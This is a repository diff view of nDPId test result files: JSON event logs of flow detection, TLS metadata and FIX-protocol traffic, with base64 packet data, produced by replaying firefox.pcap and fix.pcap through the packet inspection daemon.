00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00877{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00916{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"thread_ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","packets-captured":5441,"packets-processed":5441,"total-skipped-flows":0,"total-l4-data-len":4593506,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":6,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":45,"global_ts_msec":1620927999948}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 5441/5441

144
test/results/fix.pcap.out
View File

@@ -1,77 +1,77 @@
00454{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"fix.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00540{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1493755109242}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109242,"pkt":"THK5MeMlACJNe\/gxCABFAACKT3MAAPUGlw4IERYfwKgAFA+gqko3bYCMRQ1qAYAY\/\/+s3wAAAQEICsq+JozkIvOrOD1PATk9MDA3NQEzNT1HAQIgAAANgQxAKWj1wo9cKQAAAAEAABRnDEBj4euA7PpqAAAAAQAADiEMQENwo99tuUEAAAABAAAMAwxAYm64YJmdywAAAAE="}
00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109242,"flow_last_seen":1493755109242,"flow_idle_time":7440000,"flow_min_l4_payload_len":86,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":86,"midstream":1,"thread_ts_msec":1493755109242,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":43594,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1493755109243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109243,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04yxAAEAGeKvAqAAUCBEWH6pKD6BFDWoBN22A4oAQ\/+CtQgAAAQEICuQi8\/bKviaM"}
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"fix.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1493755109243,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1493755109243,"pkt":"THK5MeMlACJNe\/gxCABFAABNT3sAAPUGl0MIERYfwKgAFA+gqko3bYDiRQ1qAYAY\/\/8cMQAAAQEICsq+JozkIvOrOD1PATk9MDAxNAEzNT1QAQA4AAAUjFEGgw=="}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1493755109264,"pkt":"THK5MeMlACJNe\/gxCABFAABSVaMAAPUGkRYIERYfwKgAFA+gu2Bwv8eLGL2htoAY\/\/8FlAAAAQEICsq+JqLD2CKPOD1PATk9MDAxOQEzNT1QAQBgAAAA1ygEAAAC+SgE"}
00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109264,"flow_last_seen":1493755109264,"flow_idle_time":7440000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":1,"thread_ts_msec":1493755109264,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47968,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1493755109265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109265,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA0nQVAAEAGvtLAqAAUCBEWH7tgD6AYvaG2cL\/HqYAQ\/+ACDgAAAQEICsPYIsvKviai"}
00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":93,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":93,"pkt_l4_len":59,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAABPilIAADIGAaLQ9WsDwKgAFA+gsgqYEHEay+C1D1AYXjiwMAAAOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00624{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45578,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoLPdAAEAGESTAqAAU0PVrA7IKD6DL4LUPmBBxQVAQ\/\/9nMgAAAAAAAAAA"}
00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00557{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1493755109301,"pkt":"THK5MeMlACJNe\/gxCABFAAB3JWUAAPUGwS8IERYfwKgAFA+gu1Cc6Eb967pj5oAY\/\/+1oAAAAQEICsq+Jsaxc69UOD1GSVguNC4xATk9MDAwMDQxATM1PTABMzQ9MDA2MTI3ATQzPU4BNTI9MjAxNzA1MDItMTk6NTg6MjkBMTA9MTEzAQ=="}
00621{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109301,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":1,"thread_ts_msec":1493755109301,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47952,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":140,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":140,"pkt_l4_len":106,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAB+LPhAAEAGEM3AqAAU0PVrA7IKD6DL4LUPmBBxQVAY\/\/8uDQAAOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"fix.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1493755109301,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109301,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA04B5AAEAGe7nAqAAUCBEWH7tQD6DrumPmnOhHQIAQ\/+BBSgAAAQEICrFztPLKvibG"}
00515{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"fix.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1493755109365,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1493755109365,"pkt":"THK5MeMlACJNe\/gxCABFAABXdbIAAPUGcQIIERYfwKgAFA+gu2Bwv8epGL2htoAY\/\/9rRwAAAQEICsq+JwbD2CLLOD1PATk9MDAyNAEzNT1HAQCIAAAA1gw\/8YUeuFHrhQAAAAE="}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1493755109440,"pkt":"THK5MeMlACJNe\/gxCABFAABLyzMAADIGwMTQ9WsDwKgAFA+gshDsZRC0r0wvBlAYWghECQAAOD1PATk9MDAyNAEzNT1HAQCIAAAAVgxAWLVwoAAAAAAAAAE="}
00625{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109440,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":1,"thread_ts_msec":1493755109440,"l3_proto":"ip4","src_ip":"208.245.107.3","dst_ip":"192.168.0.20","src_port":4000,"dst_port":45584,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"fix.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1493755109440,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1493755109440,"pkt":"ACJNe\/gxTHK5MeMlCABFAAAoPkFAAEAG\/9nAqAAU0PVrA7IQD6CvTC8G7GUQ11AQo65yMAAAAAAAAAAA"}
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1493755109654,"pkt":"THK5MeMlACJNe\/gxCABFAABbr+gAAPUGNsgIERYfwKgAFA+gu1oMn5kifDan54AY\/\/9QgQAAAQEICsq+KCgaP0xfOD1GSVguNC4xATk9MDAwMTQBMzU9MQExMTI9ZmFybQExMD0yMTcB"}
00622{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":43,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1493755109654,"flow_last_seen":1493755109654,"flow_idle_time":7440000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":1,"thread_ts_msec":1493755109654,"l3_proto":"ip4","src_ip":"8.17.22.31","dst_ip":"192.168.0.20","src_port":4000,"dst_port":47962,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1493755109655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAAA07JVAAEAGb0LAqAAUCBEWH7taD6B8NqfnDJ+ZSYAQhgAbHwAAAQEICho\/VIrKvigo"}
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"fix.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1493755109655,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":152,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":152,"pkt_l4_len":118,"thread_ts_msec":1493755109655,"pkt":"ACJNe\/gxTHK5MeMlCABFAACK7JZAAEAGbuvAqAAUCBEWH7taD6B8NqfnDJ+ZSYAYhgDh+QAAAQEICho\/VIrKvigoOD1GSVhDT01QATk9NzEBeJwNx7ENgDAMBED9QER+x684kdwisQEtDR0N+xdw3WXtx9miEbPMQugqQ48\/iuGQlxuHyXzjXMrlCdLrvt4HtKKED90WDdY="}
